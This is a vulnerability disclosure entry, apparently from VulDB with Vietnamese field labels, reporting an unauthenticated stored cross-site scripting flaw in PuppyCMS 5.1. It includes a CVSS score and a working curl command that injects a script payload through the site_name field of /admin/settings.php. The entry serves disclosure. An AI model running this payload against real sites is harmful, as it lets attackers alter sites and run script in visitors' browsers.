| tiêu đề | PuppyCMS >= 5.1 - Cross-site Scripting Stored |
|---|
| Mô tả | # Exploit Title: PuppyCMS >= 5.1 - Cross-site Scripting Stored
# Date: 2022-10-11
# Exploit Author: Mr Empy
# Vendor Homepage: https://github.com/choregus
# Software Link: https://github.com/choregus/puppyCMS
# Version: >= 5.1
# Tested on: Linux
Title:
================
PuppyCMS >= 5.1 - Cross-site Scripting Stored
Summary:
================
PuppyCMS versions below or equal to 5.1 are vulnerable to a Cross-site Scripting Stored exploit, which allows the injection of arbitrary Javascript code through the site_name parameter without authentication. Exploitation can be used to manipulate the capabilities of victims' browsers.
Severity Level:
================
5.8 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
Affected Product:
================
PuppyCMS >= v5.1
Steps to Reproduce:
================
1. Open your terminal and run this command:
TARGET="http://x.x.x.x/puppyCMS";XSS_PAYLOAD='<script>alert("PuppyCMS XSS")</script>';curl "$TARGET/admin/settings.php" -X POST -d "site_name=$XSS_PAYLOAD&site_root=/&password=&password-repeat=&site_template=top-nav-red&from_email=your%40email.com&submit=Submit" |
|---|
| Nguồn | ⚠️ https://github.com/choregus/puppyCMS |
|---|
| Người dùng | mrempy (UID 24379) |
|---|
| Đệ trình | 12/10/2022 03:24 (cách đây 4 những năm) |
|---|
| Kiểm duyệt | 12/10/2022 11:25 (8 hours later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 210699 [puppyCMS đến 5.1 /admin/settings.php site_name Tập lệnh chéo trang] |
|---|
| điểm | 20 |
|---|